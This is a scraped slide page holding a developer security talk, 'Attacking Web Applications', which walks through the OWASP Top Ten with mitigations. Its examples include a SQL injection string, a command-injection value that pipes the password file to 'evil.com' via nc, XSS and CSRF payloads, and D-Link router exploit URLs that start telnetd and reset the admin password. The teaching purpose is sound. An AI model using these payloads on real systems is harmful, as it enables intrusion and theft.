Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 

Top Web Application Attacks and How to Prevent Them

  • 1. Attacking Web Applications Sasha Goldshtein CTO, Sela Group blog.sashag.net @goldshtn
  • 2. Sasha Goldshtein @goldshtn Every web developer must be aware of the most common web attacks, risks, and mitigations. Don’t fly blind.
  • 3. Sasha Goldshtein @goldshtn Typical Risks §  Exposure of user information -  Passwords, emails, identity theft §  Direct financial gain -  Credit card details §  Creating a botnet -  Using servers/user systems for malicious activity §  Denial of service §  Some serious damage™ -  Considering that more and more embedded systems serve stuff over HTTP
  • 4. Sasha Goldshtein @goldshtn Are They Really After Me? 1.  They could be, if you’re important. 2.  They are after your users. 3.  They are after your servers. 4.  They found you randomly on the web.
  • 5. Sasha Goldshtein @goldshtn OWASP Top Ten 1.  Injection 2.  Broken auth and session management 3.  Cross-site scripting 4.  Insecure direct object references 5.  Security misconfiguration 6.  Sensitive data exposure 7.  Missing function level access control 8.  Cross-site request forgery 9.  Using vulnerable components 10. Unvalidated redirects and forwards
  • 6. Sasha Goldshtein @goldshtn SQL Injection §  Suppose the user request parameter is …  '  or  '1'='1   §  Then the query we execute is … select  *  from  users  where  (name=''  or  '1'='1')  and  (password='whatever')   db.ExecuteReader("select  *  from  users  where  (name='"    +  Request["user"]  +  "')  and  (password='"  +  Request["password"]  +  "')");
  • 8. Sasha Goldshtein @goldshtn OS Command Injection §  Suppose we’re too lazy to perform DNS lookup, so we resort to the following: §  Suppose the hostname parameter is …  foo  ||  cat  /etc/password  |  nc  evil.com §  Then we end up sending the password file to evil.com! §  Most recent noisy exploit 10/9/2013 in DLink DIR-505 router firmware:  request=ping_test&ip_addr=127.0.0.1;  /usr/sbin/telnetd;   system("nslookup  "  +  Request["hostname"]);
  • 10. Sasha Goldshtein @goldshtn Mitigating Injections §  DO NOT trust user input §  DO NOT run code provided by the user §  DO NOT use blacklists for validation §  DO use SQL query parameters (?, @param, :param) §  DO use whitelists and regexes for validation §  DO fuzz your code with invalid input
  • 11. Sasha Goldshtein @goldshtn Sessions and Cookies §  Most web applications today store sensitive user data in cookies §  At the very least, the session identifier is stored in a cookie -  Cookies are tasty §  Don’t store anything else in cookies and don’t trust them -  What if the client sends you: Cookie:  username=dave;permissions=admin  
  • 13. Sasha Goldshtein @goldshtn Sessions and URLs •  DO NOT embed session id in URLs •  DO NOT trust cookie contents •  DO NOT trust URL query string contents http://example.com/delete_account.php?account_name=sasha •  DO NOT use predictable session ids  http://example.com/cart.php?sess=127 •  DO use a Secure, HttpOnly cookie for session id •  DO use long, random session ids
  • 14. Sasha Goldshtein @goldshtn HTTP and HTTPS §  Surprisingly many web applications still use HTTP to transmit sensitive information §  Your HTTP traffic is freely available to: -  Your Starbucks barista -  Your family members -  Your ISP -  Your boss §  As a developer, you are responsible for your users sensitive information
  • 16. Sasha Goldshtein @goldshtn You Have Been Pineappled §  WiFi Pineapple is a mobile pentesting device -  ARM SOC, RAM, internal storage, USB storage, WiFi, Ethernet, 3G modem support §  Karma mode Is this the KatieHomeWiFi? Is this the Starbucks WiFi? Is this the JFKAirportWiFi? Sure
  • 18. Sasha Goldshtein @goldshtn Use HTTPS Correctly §  DO NOT send sensitive information over HTTP §  DO NOT display login pages over HTTP §  DO NOT load HTTP frames/scripts/images in an otherwise HTTPS page §  DO insist on pure HTTPS for sensitive pages §  DO use Secure cookies for sensitive data (reminder) And, as a user: §  DO NOT connect to unsecured Wi-Fi networks (like “Free WiFi” or “Fluent”) §  DO use a VPN in insecure environments
  • 19. Sasha Goldshtein @goldshtn Storing Sensitive Information §  DO NOT store anything you don’t have to store -  Least responsibility principle §  DO comply with regulation for secure storage -  E.g. if you store credit card details, you’re in for some pain
  • 22. Sasha Goldshtein @goldshtn “Password” unseated by “123456” on SplashData’s annual “Worst Passwords” list 1.  123456 2.  password 3.  12345678 4.  qwerty 5.  abc123 6.  123456789 7.  111111 8.  1234567 9.  iloveyou 10. adobe123 11. 123123 12. admin 13. 1234567890 14. letmein 15. photoshop 16. 1234 17. monkey 18. shadow 19. sunshine 20. 12345 21. password1 22. princess 23. azerty 24. trustno1 25. 000000
  • 23. Sasha Goldshtein @goldshtn Password Storage §  DO NOT store passwords in clear text §  DO NOT store encrypted passwords §  DO hash and salt passwords §  DO reject weak passwords during signup §  DO consider using OAuth §  DISCUSS which hash function to use -  Super-slow (bcrypt) – subject to DOS -  Super-fast (MD5, SHA1) – subject to cracking
  • 24. Sasha Goldshtein @goldshtn Cross-Site Scripting (XSS) •  Injecting JavaScript into pages viewed by other users – Cookie stealing, information disclosure – DOM manipulation, tricking the user to like Facebook pages, phishing – DDOS, bitcoin mining J •  Temporary XSS  http://searchengine.com/?q=<script>alert(1);</script> •  Persistent XSS – You provide data to the server which is then permanently displayed when users visit
  • 26. Sasha Goldshtein @goldshtn Cross-Site Request Forgery (CSRF) §  Use the fact that the user is already authenticated to a website to generate requests on his behalf  <img  src="http://forum.com/delete_profile.php?confirmed=True"  />   §  Interesting variation: use CSRF to login into YouTube with the attacker’s credentials; then, Google history is stored into the attacker’s account -  “I used to know what you watched on YouTube”
  • 28. Sasha Goldshtein @goldshtn 70 Ways To Encode < <   %3C   &lt   &lt;   &LT   &LT;   &#60   &#060   &#0060   &#00060   &#000060   &#0000060   &#60;   &#060;   &#0060;   &#00060;   &#000060;   &#0000060;   &#x3c   &#x03c   &#x003c   &#x0003c   &#x00003c   &#x000003c   &#x3c;   &#x03c;   &#x003c;   &#x0003c;   &#x00003c;   &#x000003c;   &#X3c   &#X03c   &#X003c   &#X0003c   &#X00003c   &#X000003c   &#X3c;   &#X03c;   &#X003c;   &#X0003c;   &#X00003c;   &#X000003c;   &#x3C   &#x03C   &#x003C   &#x0003C   &#x00003C   &#x000003C   &#x3C;   &#x03C;   &#x003C;   &#x0003C;   &#x00003C;   &#x000003C;   &#X3C   &#X03C   &#X003C   &#X0003C   &#X00003C   &#X000003C   &#X3C;   &#X03C;   &#X003C;   &#X0003C;   &#X00003C;   &#X000003C;   x3c   x3C   u003c   u003C  
  • 29. Sasha Goldshtein @goldshtn Mitigating XSS and CSRF §  DO NOT trust user input (déjà vu?) §  DO NOT allow GETs to modify state §  DO NOT rely on blacklists §  DO escape and sanitize HTML provided by the user §  DO use whitelists or a non-HTML format like Markdown §  DO generate anti-CSRF tokens and validate them §  DO validate Referer headers
  • 30. Sasha Goldshtein @goldshtn Admin Consoles §  DO NOT leave admin consoles exposed to the Internet §  DO NOT provide “extra helpful” troubleshooting info §  DO restrict admin consoles to local network only §  DO whitelist IP addresses if absolutely necessary Some auth cookies… yum!
  • 32. Sasha Goldshtein @goldshtn DLink DIR-615 and DIR-300 Security Advisory •  OS command injection http://<IP>/tools_vct.xgi?set/runtime/switch/getlinktype=1&set/runtime/diagnostic/ pingIp=1.1.1.1`telnetd`&pingIP=1.1.1.1   •  CSRF to change admin password and enable remote administration (Internet-facing) http://<IP>/tools_admin.php?ACTION_POST=1&apply=Save +Settings&admin_name=admin&admin_password1=admin1&admin_password2=admin1&grap_auth_enable_h =0&rt_enable=on&rt_enable_h=1&rt_ipaddr=0.0.0.0&rt_port=8080     •  Information disclosure http://<IP>/DevInfo.txt   •  Insecure password storage $  cat  var/etc/httpasswd   admin:admin  
  • 33. Sasha Goldshtein @goldshtn Summary & Call To Action §  Be aware of security risks and typical vulnerabilities §  Ensure your developers get up to date security training §  Learn how to use the mitigation and prevention tools in your Web framework §  Review code for security, not just correctness §  If your web app is secure, attackers will try other routes
  • 34. Thank You! Sasha Goldshtein CTO, Sela Group blog.sashag.net @goldshtn